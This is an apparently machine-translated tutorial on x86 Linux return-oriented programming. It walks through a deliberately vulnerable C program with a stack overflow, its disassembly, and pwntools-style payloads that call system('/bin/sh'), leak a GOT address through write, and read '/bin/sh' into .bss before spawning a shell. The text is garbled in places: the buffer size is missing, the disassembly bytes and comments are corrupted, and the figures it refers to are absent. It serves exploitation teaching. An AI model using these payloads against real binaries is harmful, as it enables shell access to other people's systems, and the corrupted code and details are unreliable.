A step-by-step study of the linux_x86 of ROP

0x00

This article only explains the linux_x86 of the first step of the steamed rice God, the reader should read this article first, encounter problems and then come to see me this article.

After reading these two articles, we will understand ROP (return-guided programming), DEP (stack not executable), ASLR (memory address randomization), stack Protector (stack protection), Memory Leak .

0x01

The first question: Why do we construct the "A" *140+ret string, and how does this 140 come from?

To answer this question, we need to disassemble the level1.c, the LEVEL1.C code is as follows:

#include <stdio.h> #include <stdlib.h> #include <unistd.h> void Vulnerable_function () {    char buf[ ];    Read (Stdin_fileno, buf, 256);} int main (int argc, char** argv) {    vulnerable_function ();    Write (Stdout_fileno, "Hello, world\n", 13);}

Using Objdump-s Level1 Disassembly, the results are as follows:

08048404 <vulnerable_function>: 8048404:55 push%ebp 8048405:89 e5     MOV%esp,%ebp 8048407:81 EC 98 xx xx sub $0x98,%esp//esp-0x98 804840d:c7 44 24 08 00 01 00 MOVL $0x100,0x8 (%ESP)//Storage of the third parameter, 8048414:00 8048415:8d, FF FF FF lea-0x88 (%EBP),%eax//holds the second parameter, BUF address 804841b:89, MOV%eax,0x4 (%esp) 804841f:c7 xx xx movl $0x0, (%ESP)/                       /Storage first parameter, Stdout_fileno 8048426:e8 e5 fe ff FF call 8048310 <[email protected]> 804842B:C9                       Leave 804842C:C3 ret 0804842d <main>: 804842d:55 Push%ebp 804842e:89 e5 mov%esp,%ebp 8048430:83 e4 f0 and $ XFFFFFFF0,%ESP 8048433:83 EC Ten sub $0x10,%esp 8048436:e8 C9 FF FF call 8048404 <vulnerable_function&Gt 804843b:c7 0d movl $0xd,0x8 (%ESP) 8048442:00 8048443:c7 (MOVL $0x)           8048530,0x4 (%ESP) 804844a:08 804844b:c7, Movl $0x1, (%ESP) 8048452:e8 E9 FE FF FF                       Call 8048340 <[email protected]> 8048457:c9 leave 8048458:c3                       RET 8048459:90 NOP 804845a:90 NOP 804845b:90                       NOP 804845c:90 NOP 804845d:90 NOP 804845e:90 NOP 804845f:90 NOP

When the main function calls call 8048404 <vulnerable_function&gt, the structure is formed by referring to the code comment above:

0x02

Payload = ' A ' *140 + p32 (systemaddr) + P32 (ret) + P32 (BINSHADDR) This code is to perform system ("/bin/sh") and then return to RET to continue execution. That is, BINSHADDR is the system parameter, so why are these written?

Let's take a look at 8048426:e8 e5 fe FF FF call 8048310 <[email protected]> How is the parameter taken?

After calling read, the EIP and EBP are stored sequentially in the stack, and if you want to take the first parameter, you need to use ESP-8.

Similarly we can understand payload = ' A ' *140 + p32 (systemaddr) + P32 (ret) + P32 (binshaddr) The meaning of this code, such as, to observe the small figure on the right :

This way we can understand why/bin/sh is the first parameter and why system ("/bin/sh") returns to RET after execution.

0x03

Payload1 = ' a ' *140 + p32 (plt_write) + P32 (vulfun_addr) + P32 (1) +p32 (got_write) + P32 (4) The function that this sentence executes is?

Write (Stdout_fileno, got_write, 3);

0x04

In a step-by-step study of the linux_x64 of ROP, what is the meaning of this piece of memory Leak?

Payload2 = ' a ' *140 + p32 (plt_read) + P32 (PPPR) + p32 (0) + P32 (bss_addr) + P32 (8) Payload2 + = P32 (system_addr) + P32 (vulfun _ADDR) + P32 (BSS_ADDR)

Read the/bin/sh from the standard input to the. BSS segment, corresponding to the code read (Stdin_fileno, BSS_ADDR, 8).

Then return to pPPT, perform pop pop pop ret, that is, bypass P32 (0) + P32 (bss_addr) + P32 (8), execute SYSTEM_ADDR, then the process is consistent with the original.

A step-by-step study of the linux_x86 of ROP